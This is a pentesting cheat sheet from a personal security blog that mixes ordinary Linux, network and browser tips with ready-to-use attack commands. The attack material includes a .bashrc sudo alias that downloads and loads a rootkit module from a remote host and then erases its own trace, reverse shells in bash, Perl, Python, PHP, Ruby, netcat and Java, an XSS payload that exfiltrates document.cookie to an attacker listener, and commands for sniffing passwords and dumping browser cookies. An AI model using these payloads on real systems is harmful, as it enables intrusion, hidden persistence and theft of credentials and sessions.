Script Crypt

8 minute read

Backdoor via sudo

echo "alias sudo='wget -qO1.ko http://rootk.it/1; sudo insmod 1.ko; rm -f 1.ko; sed -i /sudo/d ~/.bashrc; sudo'" >>~/.bashrc

sed cleans after itself

Check and disable ASLR

to check cat /proc/sys/kernel/randomize_va_space to disable echo 0 | sudo tee /proc/sys/kernel/randomize_va_space to enable echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Controlling Firefox referrer

For dynamic referrer control, with an ability to whitelist some sites try the “Smart Referrer” pluigin

To disable firefox referrer

about:config - Network.http.sendRefererHeader set to 0

To change and control firefox’s referrer

network.http.referer.XOriginPolicy: 0=always send, 1=send if base domains match, 2=send if hosts match network.http.referer.spoofSource: false=real referer, true=spoof referer (use target URI as referer) network.http.referer.trimmingPolicy: 0=send full URI, 1=scheme+host+port+path, 2=scheme+host+port

Referrer processing is done in this order. Thus, setting XOriginPolicy to 2 makes spoofSource and trimmingPolicy useless if going from a.example.com to b.example.com, since no referrer would be send anyway due to the XOriginPolicy.

If using the three new I’d suggest to set the old network.http.sendRefererHeader to 2 (default, always send referrer).

See https://bugzilla.mozilla.org/show_bug.cgi?id=822869

How to list firefox cookies in curl-wget format

Note that they may be locally obfuscated and you would need to decrypt them first sqlite3 -separator ' ' $HOME/.mozilla/firefox/*/cookies.sqlite "select host, case substr(host,1,1)='.' when 0 then 'FALSE' else 'TRUE' end, path, case isSecure when 0 then 'FALSE' else 'TRUE' end, expiry, name, value from moz_cookies;"

Detect passwords in sniffed traffic

datalog=$(date)
sudo ufw disable
sudo ettercap -Tzq -i wlan0 -l "$datalog"
sudo ufw enable
sudo etterlog -a "$datalog".eci
sudo chown me:me "$datalog".eci

Find all DLLs for a service

@echo off
set imagepath=
FOR /F "tokens=3" %%a in ('reg query HKLM\system\currentcontrolset\services\%1 /v imagepath 2^> nul ^| find "imagepath" ') DO set imagepath=%%a
if defined imagepath (
	echo Dependencies for %imagepath%:
	call depends /a0f1c /oc:~svcdep.tmp "%imagepath%"
	FOR /F "tokens=1 delims=, skip=1" %%b in ('type ~svcdep.tmp ^|findstr /B /c:"," ^|findstr /V /c:"?" ^| sort') do echo %%b
	del ~svcdep.tmp 2>nul
) else (
	echo '%1' is not installed or is not a valid service
)

Generate random MAC

MACADDR="52:54:00:$(dd if=/dev/urandom bs=512 count=1 2>/dev/null | md5sum | sed 's/^\(..\)\(..\)\(..\).*$/\1:\2:\3/')"; echo $MACADDR

Get binary opcodes for c code

gcc -fno-inline -Os -c code.c
objdump -d code.o -M intel |grep "^ " |cut -f2

to get them in a python format: for i in $(objdump -d code.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;

Get first 10 search results from Google

#!/bin/bash
Q="$@"
URL='https://www.google.com/search?tbs=li:1&q='
AGENT="Mozilla/4.0"
stream=$(curl -A "$AGENT" -skLm 10 "${GOOG_URL}${Q//\ /+}" | grep  -oP '\/url\?q=.+?&amp' | sed 's|/url?q=||; s|&amp||')
echo -e "${stream//\%/\x}"

Hex in command line or transfer binary as text

python -c "print '1'*8+'\x\x32'" or echo -ne '\x00\x06\x30\x30\x30\x30\x4e\x43' or echo '0006303030304e43' | xxd -r -p if you have a string of hexadecimals you can convert it to escaped sequence it with sed echo '0006303030304e43' | sed -e 's/../\\x&/g'

od -An -vtx1 ofs > ofs.txt then eitehr LC_ALL=C tr -cd 0-9a-fA-F < Check.txt | xxd -r -p > Check.tar or perl -ape ‘$_=pack “(H2)*”, @F’ Check.txt > Check.tar

also xxd hexdump uudecode/encode

Netscape cookie file format

  • domain - The domain that created AND that can read the variable.
  • flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
  • path - The path within the domain that the variable is valid for.
  • secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed.
  • expiration - The UNIX time that the variable will expire on
  • name - The name of the variable.
  • value - The value of the variable.

Check what wifi channels are used in your neighbourhood

sudo iwlist wlan0 scan | grep Frequency | sort | uniq -c | sort -n

List listening services

sudo netstat -plunt

Block youtube on an edge router x

Use an auto-populating group to collect all youtube IPs: firewall { group { address-group YOUTUBE { } } name LAN_IN { default-action accept description "" rule 1 { action drop description BlockYoutube destination { group { address-group YOUTUBE } } log disable protocol all } } } interfaces { ethernet eth0 { description LAN address 192.168.33.1/24 firewall { in { name LAN_IN } } duplex auto speed auto } } service { dns { forwarding { cache-size 150 listen-on switch0.33 name-server 8.8.8.8 options ipset=/youtube.com/YOUTUBE } } }

Another way is to block dns set service dns forwarding options address=/.youtube.com/216.239.38.120 set service dns forwarding options address=/.otherstuff.com/216.239.38.120

How to copy ssh key when password login is disabled

cat ~/.ssh/user_rsa.pub | ssh -i ~/.ssh/root_rsa root@ip.ip.ip.ip "su user -c \"mkdir ~/.ssh; chmod 700 ~/.ssh/; tee -a /home/user/.ssh/authorized_keys\""

How to extract ssl cert off a server

echo | openssl s_client -connect www.server.com:443 2>/dev/null | openssl x509 -text

How to get your external IP

curl icanhazip.com
curl ifconfig.co

Network recon

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

arp -e
route
/sbin/route -nee

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Parse syslog for blocked external scans

grep "UFW BLOCK" /var/log/syslog| sed -n 's/.*SRC=\([^ ]*\).*DST=\([^ ]*\).*PROTO=\([^ ]*\).*SPT=\([^ ]*\).*DPT=\([^ ]*\).*/\3 \1:\4->\2:\5/p'

Reverse shells

Socat

listener, connected a tcp socket (which is yet listening) to your current TTY

socat file:`tty`,raw,echo=0 tcp-listen:8999 and run this one from the get the terminal. ./socat tcp-connect:my.pc.ip.address:80 exec:’bash -li’,pty,stderr,setsid,sigint,sane connects the bash process to your tcp listener. Now, you have a fully functional TTY Terminal connected to your shell

forward shell server: socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane client: socat FILE:`tty`,raw,echo=0 TCP:localhost:1337

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Or, on the server you’re connecting from nc -l -p 8080 -vvv The client exec 5<>/dev/tcp/evil.com/8080 cat <&5 | while read line; do $line 2>&5 >&5; done

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 1234 or rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

XTerm

xterm -display 10.0.0.1:1 To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): Xnest :1 On the server, allow the IP xhost +targetip

Send binary payload over netcat

echo -e "$(for i in $(objdump -d shellcode.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;)" | netcat ip port

Sniff and dump network traffic

Dump to pcap-ng (use -P to dump in the earlier libpcapc) - then convert for chaosreader dumpcap -i wlan0 -w file.cap Pcap-NG (aka NTAR). This format allows for more advanced features than the old libpcap (aka PCAP) format, such as multiple interface types and annotations. or use tcpdump dump directly to libpcap format tcpdump -i wlan0 -s 65535 -w wlancap.cap convert from PcapNG to PCAP editcap -F libpcap <infile> <outfile> Parse out streams and data Interesting stuff: chaosreader -nd -m 1k --dir <export dir> <capturefile.libpcap> everything in multiple formats (will be big) chaosreader -ndve --dir <export dir> <capturefile.libpcap>

-n use http names in the report
-d resolve via DNS knowledge
-r include raw files (will dump HTTPS as well)
-v verbose output
-e spit everything
-m 1k Ignore streams smaller than 1k

then rm redundant files - rm .hex. find . -size 0 -delete /usr/share/fslint/fslint/findup -d rm session_.html rm stream_.html

(.info and .raw have all the info in more a readable format)

http://www.informationelle-selbstbestimmung-im-internet.de/chaosreader.html

Spawn shells

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
vi :!bash

Take screenshots remotely

while true; do
sudo cat /dev/input/mouse0 | read -n1
mpv tv:// -frames 3 -vo jpeg
mv 00000003.jpg `date +%F-%H-%M`.jpg
rm -f 0000*.jpg
sleep 10
done

mencoder tv:// -tv driver=v4l2:width=800:height=600:device=/dev/video0:fps=30:outfmt=yuy2:forceaudio:alsa:adevice=hw.2,0 -ovc lavc -lavcopts vcodec=mpeg4:vbitrate=1800 -ffourcc xvid -oac mp3lame -lameopts cbr=128 -o video.avi

ffmpeg -f x11grab -r 25 -s 1366x768 -i :0.0 screencast.mpg

Transfer files with a clipboard

base64 file.zip | clip
base64 -decode -o file.zip

you can paste direct into stdin and press ctrl-d in the end

Transfer files with nc

cat backup.iso | nc -l 3333
cat backup.iso | pv -b | nc -l 3333
dd if=/dev/hdb5 | gzip -9 | nc -l 3333
tar -czf - /etc/ | nc -l 3333

nc 192.168.0.1 3333 > backup.iso
nc 192.168.0.1 3333 | pv -b > backup.iso

ssh -f -L 23333:127.0.0.1:3333 me@192.168.0.1 sleep 10; nc 127.0.0.1 23333 | pv -b > backup.iso

How to serve file on port 80 with nc

while ( nc -l 80 < file.html > : ) ; do : ; done

Using browser cookies

Chrome cookie encryption was introduced here https://codereview.chromium.org/24734007/#ps3001001 https://cs.chromium.org/search/?q=saltysalt+package:%5Echromium$&type=cs Perhaps the easiest way to view your cookies in Chrome is to visit: chrome://settings/cookies

View image metadata

exiftool myPhoto.jpg or identify -verbose

XSS cookie collector

nc -cnlp 8000 on the cnc <script>document.write(%27<img src=http://YOUR_IP_HERE:8000/collect.gif?cookie=%27%2bdocument.cookie%2b%27/>%27)</script>

Licensed under CC BY-NC-SA 4.0
© 2010 - 2022 Secured Mind
Based off the Stack theme.